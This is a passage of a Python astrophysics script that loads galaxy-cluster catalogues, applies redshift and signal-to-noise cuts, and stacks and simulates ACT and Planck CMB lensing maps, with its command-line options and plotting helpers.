parser.add_argument(\n \"--grad-lmax\", type=int, default=d.gradient_lmax, help=\"Maximum multipole for Planck.\"\n )\n parser.add_argument(\n \"--hres-lmin\", type=int, default=None, help=\"Minimum multipole for ACT.\"\n )\n parser.add_argument(\n \"--hres-lmax\", type=int, default=d.highres_lmax, help=\"Maximum multipole for ACT.\"\n )\n parser.add_argument(\n \"--klmin\", type=int, default=d.kappa_Lmin, help=\"Minimum multipole for recon.\"\n )\n parser.add_argument(\n \"--klmax\", type=int, default=d.kappa_Lmax, help=\"Maximum multipole for recon.\"\n )\n parser.add_argument(\n \"--hres-lxcut\", type=int, default=None, help=\"Lxcut for ACT.\"\n )\n parser.add_argument(\n \"--hres-lycut\", type=int, default=None, help=\"Lycut for ACT.\"\n )\n parser.add_argument(\n \"--zmin\", type=float, default=None, help=\"Minimum redshift.\"\n )\n parser.add_argument(\n \"--zmax\", type=float, default=None, help=\"Maximum redshift.\"\n )\n parser.add_argument(\n \"--snmin\", type=float, default=None, help=\"Minimum SNR.\"\n )\n parser.add_argument(\n \"--snmax\", type=float, default=None, help=\"Maximum SNR.\"\n )\n parser.add_argument(\n \"--y0min\", type=float, default=None, help=\"Minimum y0.\"\n )\n parser.add_argument(\n \"--y0max\", type=float, default=None, help=\"Maximum y0.\"\n )\n parser.add_argument(\n \"--full-sim-index\", \n type=int, \n default=None, \n help=\"Use full-sky CMB simulations with this index. Defaults to None.\"\n )\n parser.add_argument(\n \"--ilc-lmin\", type=int, default=d.ilc_lmin, help=\"Minimum ell for ILC solution.\"\n )\n parser.add_argument(\n \"--ilc-lmax\", type=int, default=d.ilc_lmax, help=\"Maxmimum ell for ILC solution.\"\n )\n parser.add_argument(\n \"--arcmax\", type=float, default=d.arcmax, help=\"Maximum arcmin distance for binning.\"\n )\n parser.add_argument(\n \"--arcstep\", type=float, default=d.arcstep, help=\"Step arcmin for binning.\"\n )\n parser.add_argument(\n \"--max-rms\",\n type=float,\n default=d.max_rms_noise,\n help=\"Maximum RMS noise in uK-arcmin, beyond which to reject stamps.\",\n )\n parser.add_argument(\n \"--swidth\", type=float, default=d.stamp_width_arcmin, help=\"Stamp width arcmin.\"\n )\n parser.add_argument(\n \"--pwidth\", type=float, default=d.pix_width_arcmin, help=\"Pixel width arcmin.\"\n )\n parser.add_argument(\n \"--no-fit-noise\",\n action=\"store_true\",\n help=\"If True, do not fit empirical noise, but use RMS values specified in defaults.yml.\",\n )\n parser.add_argument(\n \"--day-null\",\n action=\"store_true\",\n help=\"Use day-night as data.\",\n )\n parser.add_argument(\n \"--tap-per\", type=float, default=d.taper_percent, help=\"Taper percentage.\"\n )\n parser.add_argument(\n \"--pad-per\", type=float, default=d.pad_percent, help=\"Pad percentage.\"\n )\n parser.add_argument(\n \"--debug-fit\", type=str, default=None, help=\"Which fit to debug.\"\n )\n parser.add_argument(\n \"--debug-anomalies\",\n action=\"store_true\",\n help=\"Whether to save plots of excluded anomalous stamps.\",\n )\n parser.add_argument(\n \"--debug-powers\",\n action=\"store_true\",\n help=\"Whether to plot various power spectra from each stamp.\",\n )\n parser.add_argument(\n \"--debug-nl\",\n action=\"store_true\",\n help=\"Whether to plot Nl for weighting and stop after one cluster.\",\n )\n parser.add_argument(\n \"--no-90\", action=\"store_true\", help=\"Do not use the 90 GHz map.\"\n )\n parser.add_argument(\n \"--inpaint\", action=\"store_true\", help=\"Inpaint gradient.\"\n )\n parser.add_argument(\n \"--no-sz-sub\",\n action=\"store_true\",\n help=\"Use the high-res maps without SZ subtraction.\",\n )\n parser.add_argument(\n \"--s19\",\n action=\"store_true\",\n help=\"Use preliminary 2019 data.\",\n )\n parser.add_argument(\n \"--curl\",\n action=\"store_true\",\n help=\"Do curl null test instead of lensing.\",\n )\n parser.add_argument(\n \"--inject-sim\",\n action=\"store_true\",\n help=\"Instead of using data, simulate a lensing cluster and Planck+ACT (or unlensed for mean-field).\",\n )\n parser.add_argument(\n \"--lensed-sim-version\",\n type=str,\n default=d.lensed_sim_version,\n help=\"Default lensed sims to inject.\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", help=\"Overwrite existing version.\"\n )\n parser.add_argument(\n \"--is-meanfield\", action=\"store_true\", help=\"This is a mean-field run.\"\n )\n parser.add_argument(\n \"--debug-stack\", action=\"store_true\", help=\"Skip reconstruction and just stack on gradient and high-res.\"\n )\n parser.add_argument(\n \"--bcg\", action=\"store_true\", help=\"Use BCGs for Hilton Catalog.\"\n )\n parser.add_argument(\n \"--rand-rot\", action=\"store_true\", help=\"Rotate high-res stamp by random number of 90 degrees as a null test.\"\n )\n parser.add_argument(\n \"--night-only\", action=\"store_true\", help=\"Use night-only maps.\"\n )\n parser.add_argument(\n \"--full-nl\", action=\"store_true\", help=\"Do not assume estimator is optimal for Nl weighting.\"\n )\n parser.add_argument(\n \"--act-only-in-hres\",\n action=\"store_true\",\n help=\"Use ACT only maps in high-res instead of ACT+Planck.\",\n )\n parser.add_argument(\n \"--save-power\", action=\"store_true\", help=\"Save power spectrum of each stamp.\"\n )\n parser.add_argument(\n \"--no-150\", action=\"store_true\", help=\"Do not use the 150 GHz map.\"\n )\n parser.add_argument(\n \"--freq-null\", action=\"store_true\", help=\"Use 90-150 GHz for high-res.\"\n )\n parser.add_argument(\n \"--no-filter\", \n action=\"store_true\", \n help=\"Remove filters and stack without lensing reconstruction (use with --debug-stack)\"\n )\n parser.add_argument(\n \"--hres-grad\", \n action=\"store_true\", \n help=\"Replace tSZ-free gradient with high-res co-adds (may want to use with --inpaint)\"\n )\n parser.add_argument(\n \"--grad-noszsub\", \n action=\"store_true\", \n help=\"No SZ model image subtraction when replacing tSZ-free gradient with high-res co-adds (use with --hres-grad)\"\n )\n parser.add_argument(\n \"--decmin\", type=float, default=None, help=\"Minimum declination in degree.\"\n )\n args = parser.parse_args()\n\n if args.hres_lmin is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lmin', d.conservative_highres_lmin)\n else:\n setattr(args, 'hres_lmin', d.aggressive_highres_lmin)\n\n if args.hres_lycut is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lycut', d.conservative_highres_lycut)\n else:\n setattr(args, 'hres_lycut', d.aggressive_highres_lycut)\n\n if args.hres_lxcut is None:\n if args.act_only_in_hres:\n setattr(args, 'hres_lxcut', d.conservative_highres_lxcut)\n else:\n setattr(args, 'hres_lxcut', d.aggressive_highres_lxcut)\n\n\n \"\"\"\n We will save results to a directory in paths.yml:scratch.\n To decide on the name and to ensure that any meanfields we make\n have identical noise properties, we build some strings:\n \"\"\"\n\n tags.dstr = \"night\" if args.night_only else \"daynight\"\n tags.apstr = \"act\" if args.act_only_in_hres else \"act_planck\"\n tags.mstr = \"_meanfield\" if args.is_meanfield else \"\"\n tags.n90str = \"_no90\" if args.no_90 else \"\"\n tags.s19str = \"s19\" if args.s19 else \"s18\" \n curlstr = \"_curl\" if args.curl else \"\"\n findstr = f\"_{args.full_sim_index:06d}\" if not(args.full_sim_index is None) else \"\"\n if not(args.full_sim_index is None):\n assert args.night_only and not(args.act_only_in_hres), \"Full sims only currently for night-only act_planck\"\n\n # The directory name string\n vstr = f\"{args.version}_{args.cat_type}_plmin_{args.grad_lmin}_plmax_{args.grad_lmax}_almin_{args.hres_lmin}_almax_{args.hres_lmax}_klmin_{args.klmin}_klmax_{args.klmax}_lxcut_{args.hres_lxcut}_lycut_{args.hres_lycut}_swidth_{args.swidth:.2f}_tapper_{args.tap_per:.2f}_padper_{args.pad_per:.2f}_{tags.dstr}_{tags.apstr}{tags.n90str}_{tags.s19str}{curlstr}{tags.mstr}{findstr}\"\n\n\n # File save paths\n savedir = paths.scratch + f\"/{vstr}/\"\n debugdir = paths.scratch + f\"/{vstr}/debug/\"\n\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n\n overwrite = args.overwrite\n if not (overwrite):\n assert not (\n os.path.exists(savedir)\n ), \"This version already exists on disk. Please use a different version identifier or use the overwrite argument.\"\n if rank == 0:\n try:\n os.makedirs(savedir)\n except:\n if overwrite:\n pass\n else:\n raise\n try:\n os.makedirs(debugdir)\n except:\n if overwrite:\n pass\n else:\n raise\n comm.Barrier() # Wait for other processes to catch up with rank=0 before saving to these directories\n\n paths.debugdir = debugdir\n paths.savedir = savedir\n return start_time,paths,defaults,args,tags,rank,data_choice\n\ndef cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass):\n if zmin is not None:\n ras = ras[zs>zmin]\n decs = decs[zs>zmin]\n sns = sns[zs>zmin]\n y0s = y0s[zs>zmin]\n mass = mass[zs>zmin]\n zs = zs[zs>zmin]\n if zmax is not None:\n ras = ras[zs<=zmax]\n decs = decs[zs<=zmax]\n sns = sns[zs<=zmax]\n y0s = y0s[zs<=zmax]\n mass = mass[zs<=zmax]\n zs = zs[zs<=zmax]\n if snmin is not None:\n ras = ras[sns>snmin]\n decs = decs[sns>snmin]\n zs = zs[sns>snmin]\n y0s = y0s[sns>snmin]\n mass = mass[sns>snmin]\n sns = sns[sns>snmin]\n if snmax is not None:\n ras = ras[sns<=snmax]\n decs = decs[sns<=snmax]\n zs = zs[sns<=snmax]\n y0s = y0s[sns<=snmax]\n mass = mass[sns<=snmax]\n sns = sns[sns<=snmax]\n if y0min is not None:\n ras = ras[y0s>y0min]\n decs = decs[y0s>y0min]\n zs = zs[y0s>y0min]\n sns = sns[y0s>y0min]\n mass = mass[y0s>y0min]\n y0s = y0s[y0s>y0min]\n if y0max is not None:\n ras = ras[y0s<=y0max]\n decs = decs[y0s<=y0max]\n zs = zs[y0s<=y0max]\n sns = sns[y0s<=y0max]\n mass = mass[y0s<=y0max]\n y0s = y0s[y0s<=y0max]\n if decmin is not None:\n ras = ras[np.abs(decs)<=decmin]\n zs = zs[np.abs(decs)<=decmin]\n y0s = y0s[np.abs(decs)<=decmin]\n sns = sns[np.abs(decs)<=decmin] \n mass = mass[np.abs(decs)<=decmin] \n decs = decs[np.abs(decs)<=decmin] \n return ras,decs,sns,zs,y0s,mass\n\ndef catalog_interface(cat_type,is_meanfield,nmax=None,zmin=None,zmax=None,bcg=False,snmin=None,snmax=None,y0min=None,y0max=None,decmin=None):\n data = {}\n if cat_type=='hilton_dr5':\n if is_meanfield:\n #catalogue_name = paths.data+ 'selection/S18d_202003Mocks_DESSNR6Scaling/mockCatalog_combined.fits'\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits'\n else:\n #catalogue_name = paths.data+ 'AdvACT_S18Clusters_v1.0-beta.fits'\n #catalogue_name = paths.data+ 'AdvACT_unconfirmed_fixedSNR5p5.fits' \n catalogue_name = paths.data+ 'DR5_cluster-catalog_v1.0b2.fits' # DR5 baseline\n\n hdu = fits.open(catalogue_name)\n if bcg:\n ras = hdu[1].data['opt_RADeg']\n decs = hdu[1].data['opt_DECDeg']\n decs = decs[ras>=0]\n zs = hdu[1].data['redshift'][ras>=0]\n sns = hdu[1].data['SNR'][ras>=0]\n y0s = hdu[1].data['fixed_y_c'][ras>=0]\n mass = hdu[1].data['M500'][ras>=0]\n ras = ras[ras>=0]\n else:\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s\n\n elif cat_type=='hilton_dr6':\n\n if is_meanfield:\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits' # needs mock for DR6, this is DR5 mock\n else:\n catalogue_name = paths.cat_data+ 'dr6-3freq-multipass-20220404/dr6-3freq-multipass_mass.fits' # corresponds to DR6 coadd\n\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500c' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s \n\n elif cat_type=='hilton_dr6_simple':\n\n if is_meanfield:\n catalogue_name = paths.data+ 'mocks_S18d_202006_DESSNR6Scaling/mockCatalog_combined.fits' # needs mock for DR6, this is DR5 mock\n else:\n catalogue_name = paths.data+ '20230721/catalogs/s08s21-3freq-flagdust-multipass-extended_mass.fits' # corresponds to DR6 coadd simple\n \n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RADeg']\n decs = hdu[1].data['DECDeg']\n zs = hdu[1].data['redshift']\n sns = hdu[1].data['SNR' if not (is_meanfield) else 'fixed_SNR']\n y0s = hdu[1].data['fixed_y_c']\n mass = hdu[1].data['M500c' if not (is_meanfield) else 'true_M500']\n\n ras,decs,sns,zs,y0s,mass = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax,y0s,y0min,y0max,decmin,mass)\n ras = ras[:nmax]\n decs = decs[:nmax]\n y0s = y0s[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['sns'] = sns\n data['mass'] = mass\n data['y0s'] = y0s \n \n elif cat_type=='planck_union':\n\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'placnk_union_randoms.txt'\n ras, decs = np.loadtxt(catalogue_name, unpack=True)\n zs = ras*0 \n mass = ras*0 \n\n else:\n catalogue_name = paths.data+ 'SZ-union_R2.08.fits'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['REDSHIFT']\n mass = hdu[1].data['MSZ']\n\n ras = ras[zs >= 0.2]\n decs = decs[zs >= 0.2] \n mass = mass[zs >= 0.2]\n zs = zs[zs >= 0.2]\n \n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n mass = mass[:nmax]\n ws = ras*0 + 1\n data['mass'] = mass\n\n\n elif cat_type=='spt_union':\n\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'spt_union_randoms.txt'\n ras, decs = np.loadtxt(catalogue_name,unpack=True)\n zs = ras*0 \n\n else:\n # SPTSZ 2019 catalogue\n catalogue_name = paths.data+ 'sptsz2500d_cluster_sample_Bocquet19.fits'\n hdu = fits.open(catalogue_name)\n ras0 = hdu[1].data['RA']\n decs0 = hdu[1].data['DEC']\n zs0 = hdu[1].data['REDSHIFT'] \n\n # SPTECS 2019 catalogue\n catalogue_name = paths.data+ 'sptecs_catalog_oct919.fits'\n hdu = fits.open(catalogue_name)\n ras1 = hdu[1].data['RA']\n decs1 = hdu[1].data['DEC']\n zs1 = hdu[1].data['REDSHIFT']\n\n # SPTPol 2019 catalogue \n catalogue_name = paths.data+ 'sptpol100d_catalog_huang19.fits'\n hdu = fits.open(catalogue_name)\n ras2 = hdu[1].data['RA']\n decs2 = hdu[1].data['Dec']\n zs2 = hdu[1].data['redshift'] \n\n ras = np.concatenate((ras0, ras1, ras2)) \n decs = np.concatenate((decs0, decs1, decs2)) \n zs = np.concatenate((zs0, zs1, zs2)) \n\n ras = ras[zs > 0]\n decs = decs[zs > 0] \n zs = zs[zs > 0] \n \n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='sdss_redmapper':\n if is_meanfield:\n catalogue_name = paths.data+ 'redmapper_dr8_public_v6.3_randoms.fits'\n else:\n catalogue_name = paths.data+ 'redmapper_dr8_public_v6.3_catalog.fits'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['Z_LAMBDA' if not(is_meanfield) else 'Z']\n lams = hdu[1].data['LAMBDA']\n ras = ras[decs<25]\n zs = zs[decs<25]\n lams = lams[decs<25]\n decs = decs[decs<25]\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n lams = lams[:nmax]\n ws = ras*0 + 1\n data['lams'] = lams\n\n elif cat_type=='des_redmapper':\n if is_meanfield:\n catalogue_name = paths.data+ 'y3_gold_2.2.1_wide_sofcol_run_redmapper_v6.4.22_randcat_z0.10-0.95_lgt020_vl02.fit'\n else:\n catalogue_name = paths.data+ 'y3_gold_2.2.1_wide_sofcol_run_redmapper_v6.4.22_lgt20_vl02_catalog.fit'\n hdu = fits.open(catalogue_name)\n ras = hdu[1].data['RA']\n decs = hdu[1].data['DEC']\n zs = hdu[1].data['Z_LAMBDA' if not(is_meanfield) else 'ZTRUE']\n sns = hdu[1].data['LAMBDA_CHISQ' if not(is_meanfield) else 'LAMBDA_IN']\n\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n sns = sns[:nmax]\n ws = ras*0 + 1\n data['lams'] = sns\n\n elif cat_type[:5]=='cmass':\n scat = cat_type.split('_')\n if len(scat)==1: raise ValueError(\"Please specify CMASS catalog as cmass_dr11 or cmass_dr12.\")\n dr = scat[1].lower()\n if dr=='dr11':\n broot = paths.boss_dr11_data\n fstr = 'DR11v1'\n elif dr=='dr12':\n broot = paths.boss_dr12_data\n fstr = 'DR12v5'\n if is_meanfield:\n # One random has 50x, more than enough for mean-fields.\n boss_files = [broot+x for x in [f'random0_{fstr}_CMASS_North.fits',f'random0_{fstr}_CMASS_South.fits']]\n else:\n boss_files = [broot+x for x in [f'galaxy_{fstr}_CMASS_North.fits',f'galaxy_{fstr}_CMASS_South.fits']]\n if zmin is None: zmin = 0.43\n if zmax is None: zmax = 0.70\n ras,decs,ws,zs = catalogs.load_boss(boss_files,zmin=zmin,zmax=zmax,do_weights=not(is_meanfield),sys_weights=False)\n if ws is None: ws = ras*0 + 1\n ws = ws[decs<25]\n ras = ras[decs<25]\n zs = zs[decs<25]\n decs = decs[decs<25]\n if nmax is not None:\n \"\"\"\n We have to be a bit more careful when a max number of random galaxies is requested for BOSS, because\n there is a North/South split.\n \"\"\"\n Ntot = len(ras)\n np.random.seed(100)\n inds = np.random.choice(Ntot,size=nmax,replace=False)\n ras = ras[inds]\n decs = decs[inds]\n ws = ws[inds]\n zs = zs[inds]\n\n elif cat_type=='wise_panstarrs':\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'wise_panstarrs_randoms.txt'\n else:\n catalogue_name = paths.data+ 'wise_panstarrs_radec.txt'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n ras = ras[:nmax]\n decs = decs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='madcows_photz':\n if is_meanfield:\n # made using mapcat.py followed by randcat.py\n catalogue_name = paths.data+ 'madcows_photz_randoms.txt'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n zs = ras*0\n else:\n catalogue_name = paths.data+ 'madcows_cleaned.txt'\n ras,decs,zs,sns = np.genfromtxt(catalogue_name,usecols=[2,3,6,8],unpack=True,delimiter=',')\n ras = ras[zs>0]\n decs = decs[zs>0]\n sns = sns[zs>0]\n zs = zs[zs>0]\n\n ras = ras[sns>0]\n decs = decs[sns>0]\n zs = zs[sns>0]\n sns = sns[sns>0]\n\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n\n sns = sns[:nmax]\n data['lams'] = sns\n\n zs = zs[:nmax]\n ras = ras[:nmax]\n decs = decs[:nmax]\n ws = ras*0 + 1\n\n elif cat_type=='hsc_camira':\n if is_meanfield:\n catalogue_name = paths.data+ 'rand_comb_s19a_wide_sm_z084.dat'\n ras,decs = np.loadtxt(catalogue_name,unpack=True)\n sns = None\n zs = ras*0\n else:\n catalogue_name = paths.data+ 'camira_s19a_wide_sm_v1_01z11.dat'\n ras,decs,sns,zs = np.loadtxt(catalogue_name,unpack=True)\n ras,decs,sns,zs = cut_z_sn(ras,decs,sns,zs,zmin,zmax,snmin,snmax)\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n if not(is_meanfield):\n sns = sns[:nmax]\n data['lams'] = sns\n ws = ras*0 + 1\n\n elif cat_type=='vrec_cmass':\n ras,decs,zs,ws = load_vrec_catalog_boss(paths.boss_vrec_data + 'catalog.txt')\n ws = -ws[decs<25] / 299792. # (-v/c)\n ras = ras[decs<25]\n zs = zs[decs<25]\n decs = decs[decs<25]\n\n ras = ras[:nmax]\n decs = decs[:nmax]\n zs = zs[:nmax]\n ws = ws[:nmax]\n\n data['lams'] = ws*0\n \n \n else:\n raise NotImplementedError\n \n return ras,decs,zs,ws,data\n\ndef load_beam(freq):\n #if freq=='f150': fname = paths.data+'s16_pa2_f150_nohwp_night_beam_tform_jitter.txt'\n #elif freq=='f090': fname = paths.data+'s16_pa3_f090_nohwp_night_beam_tform_jitter.txt'\n if freq=='f150': fname = paths.data+'corrected_beam_150.txt'\n elif freq=='f090': fname = paths.data+'corrected_beam_090.txt'\n ls,bls = np.loadtxt(fname,usecols=[0,1],unpack=True)\n assert ls[0]==0\n bls = bls / bls[0]\n return maps.interp(ls,bls)\n\n\n\n\ndef load_dumped_stats(mvstr,get_extra=False):\n savedir = paths.scratch + f\"/{mvstr}/\"\n assert os.path.exists(savedir), f\"The path corresponding to {savedir} does not exist. If this is a meanfield, are you sure the parameters for your current run match the parameters in any existing meanfield directories?\" \n s = stats.load_stats(f'{savedir}')\n shape,wcs = enmap.read_map_geometry(f'{savedir}/map_geometry.fits')\n if get_extra:\n kmask = enmap.read_map(f'{savedir}/kmask.fits')\n modrmap = enmap.read_map(f'{savedir}/modrmap.fits')\n bin_edges = np.loadtxt(f'{savedir}/bin_edges.txt')\n assert wcsutils.equal(kmask.wcs,modrmap.wcs)\n assert wcsutils.equal(kmask.wcs,wcs)\n try:\n with open(f'{savedir}/cat_data_columns.txt', 'r') as file:\n columns = file.read().replace('\\n', '').split(' ')\n data = {}\n dat = np.load(f\"{savedir}/mstats_dump_vectors_data.npy\")\n assert len(columns)==dat.shape[1]\n for i,col in enumerate(columns):\n data[col] = dat[:,i]\n except:\n data = None\n try:\n profs = np.loadtxt(f\"{savedir}/profiles.txt\")\n except:\n profs = None\n return s, shape, wcs, kmask, modrmap, bin_edges,data,profs\n else:\n return s, shape, wcs\n\n\n\ndef analyze(s,wcs):\n N_stamp = s.vectors['kw'].shape[0]\n V1 = s.vectors['kw'].sum()\n V2 = s.vectors['kw2'].sum()\n kmap = enmap.enmap(s.stacks['kmap']*N_stamp / V1,wcs)\n\n try:\n unweighted_stack = enmap.enmap(s.stacks['ustack'],wcs)\n except:\n unweighted_stack = None\n\n nmean_weighted_kappa_stack = kmap.copy()\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n kstack = enmap.enmap((s.stacks['wk_real'] + 1j*s.stacks['wk_imag']) / s.stacks['wk_iwt'],wcs)\n kstack[~np.isfinite(kstack)] = 0\n kmap = enmap.ifft(kstack,normalize='phys').real\n opt_weighted_kappa_stack = kmap.copy()\n\n\n opt_binned = s.vectors['wk1d'].sum(axis=0) / V1\n diff = s.vectors['k1d'] - opt_binned\n cov = np.dot((diff * s.vectors['kw']).T,diff) / (V1-(V2/V1))\n opt_covm = cov/N_stamp\n opt_corr = stats.cov2corr(opt_covm)\n opt_errs = np.sqrt(np.diag(opt_covm))\n\n binned = s.stats['k1d']['mean']\n covm = s.stats['k1d']['covmean']\n corr = stats.cov2corr(s.stats['k1d']['covmean'])\n errs = s.stats['k1d']['errmean']\n\n\n return unweighted_stack,nmean_weighted_kappa_stack,opt_weighted_kappa_stack,opt_binned,opt_covm,opt_corr,opt_errs,binned,covm,corr,errs\n \n \n\n\ndef plot(fname,stamp,tap_per,pad_per,crop=None,lim=None,cmap='coolwarm',quiver=None,label='$\\\\kappa$ (dimensionless)'):\n kmap = stamp\n trimy = int((tap_per+pad_per)/100. * kmap.shape[0])\n trimx = int((tap_per+pad_per)/100. * kmap.shape[1])\n if trimy>0 and trimx>0:\n tmap = kmap[trimy:-trimy,trimx:-trimx]\n else:\n tmap = kmap\n if crop is not None:\n tmap = maps.crop_center(tmap,crop)\n zfact = tmap.shape[0]*1./kmap.shape[0]\n twidth = tmap.extent()[0]/putils.arcmin\n io.plot_img(tmap,fname, flip=False, ftsize=12, ticksize=10,arc_width=twidth,xlabel='$\\\\theta_x$ (arcmin)',ylabel='$\\\\theta_y$ (arcmin)',cmap=cmap,lim=lim,quiver=quiver,label=label)\n\n\n\n\ndef get_hdv_cc():\n from szar import counts\n ombh2 = 0.0223\n om = 0.24\n h = 0.73\n ns = 0.958\n omb = ombh2 / h**2\n omc = om - omb\n omch2 = omc * h**2.\n As = cosmology.As_from_s8(sigma8 = 0.76,bounds=[1.9e-9,2.5e-9],rtol=1e-4,omegab = omb, omegac = omc, ns = ns, h = h)\n print(As)\n params = {}\n params['As'] = As\n params['H0'] = h * 100.\n params['omch2'] = omch2\n params['ombh2'] = ombh2\n params['ns'] = ns\n params['mnu'] = 0.0\n\n conc = 3.2\n cc = counts.ClusterCosmology(params,skipCls=True,skipPower=True,skip_growth=True)\n return cc\n\n\ndef get_seed(tag,task,is_meanfield):\n if tag=='lensed':\n return (0,task)\n elif tag=='mf':\n return (1,task)\n else:\n i = 1 if is_meanfield else 0\n if tag=='noise_plc':\n return (2,i,task)\n elif tag=='noise_act_150':\n return (3,i,task)\n elif tag=='noise_act_90':\n return (4,i,task)\n\nclass Simulator(object):\n \n def __init__(self,is_meanfield,stamp_width_arcmin,pix_arcmin,lensed_version,\n plc_rms,act_150_rms,act_90_rms):\n\n \"\"\"\n \n \"\"\"\n self.plc_rms=plc_rms \n self.act_150_rms=act_150_rms \n self.act_90_rms=act_90_rms\n bfact = float(re.search(rf'bfact_(.*?)_pfact', lensed_version).group(1))\n npix = int(stamp_width_arcmin * bfact / pix_arcmin)\n self.dnpix = int(stamp_width_arcmin / (pix_arcmin))\n shape,wcs = enmap.geometry(pos=(0,0),res=putils.arcmin * pix_arcmin,shape=(npix,npix),proj='plain')\n cshape,cwcs = enmap.geometry(pos=(0,0),res=putils.arcmin * pix_arcmin,shape=(self.dnpix,self.dnpix),proj='plain')\n self.cwcs = cwcs\n self.ipsizemap = enmap.pixsizemap(cshape,cwcs)\n theory = cosmology.default_theory()\n self.shape,self.wcs = shape,wcs\n self.modlmap = enmap.modlmap(shape,wcs)\n self.is_meanfield = is_meanfield\n self.planck_beam = maps.gauss_beam(self.modlmap,defaults.planck_smica_beam_fwhm)\n wy, wx = enmap.calc_window(self.shape)\n act_pixwin = wy[:,None] * wx[None,:]\n self.act_150_beam = load_beam('f150')(self.modlmap) * act_pixwin\n self.act_90_beam = load_beam('f090')(self.modlmap) * act_pixwin\n if self.is_meanfield:\n ucltt = theory.uCl('TT',self.modlmap)\n self.mgen = maps.MapGen((1,)+self.shape,self.wcs,ucltt[None,None])\n else:\n self.savedir = paths.scratch + f\"/{lensed_version}/\"\n \n def load_kmap(self,task):\n if self.is_meanfield:\n return self.mgen.get_map(seed=get_seed(\"mf\",task,self.is_meanfield),harm=True)[0]\n else:\n kreal = enmap.read_map(f'{self.savedir}lensed_kmap_real_{task:06d}.fits',sel=np.s_[0,...])\n kimag = enmap.read_map(f'{self.savedir}lensed_kmap_imag_{task:06d}.fits',sel=np.s_[0,...])\n assert wcsutils.equal(kreal.wcs,self.wcs)\n assert wcsutils.equal(kimag.wcs,self.wcs)\n return enmap.enmap(kreal + 1j*kimag,self.wcs)\n\n def apply_pix_beam_slice(self,kmap,exp):\n if exp=='plc':\n beam = self.planck_beam\n elif exp=='act_150':\n beam = self.act_150_beam\n elif exp=='act_90':\n beam = self.act_90_beam\n ret = maps.crop_center(enmap.ifft(kmap * beam,normalize='phys').real,self.dnpix)\n assert wcsutils.equal(ret.wcs,self.cwcs)\n return ret\n \n def get_obs(self,task):\n kmap = self.load_kmap(task) \n kmap *= kmap.pixsize()**0.5 # apply physical normalization, since this is turned off in make_lensed_sims.py and MapGen\n imap_plc = self.apply_pix_beam_slice(kmap,'plc')\n imap_act_150 = self.apply_pix_beam_slice(kmap,'act_150')\n imap_act_90 = self.apply_pix_beam_slice(kmap,'act_90')\n \n shape,wcs = imap_plc.shape,imap_plc.wcs\n noise_planck = maps.white_noise(shape,wcs,self.plc_rms,seed=get_seed(\"noise_plc\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n noise_act_150 = maps.white_noise(shape,wcs,self.act_150_rms,seed=get_seed(\"noise_act_150\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n noise_act_90 = maps.white_noise(shape,wcs,self.act_90_rms,seed=get_seed(\"noise_act_90\",task,self.is_meanfield),ipsizemap=self.ipsizemap)\n\n return imap_plc + noise_planck, imap_act_150 + noise_act_150, imap_act_90 + noise_act_90\n\n\n\ndef 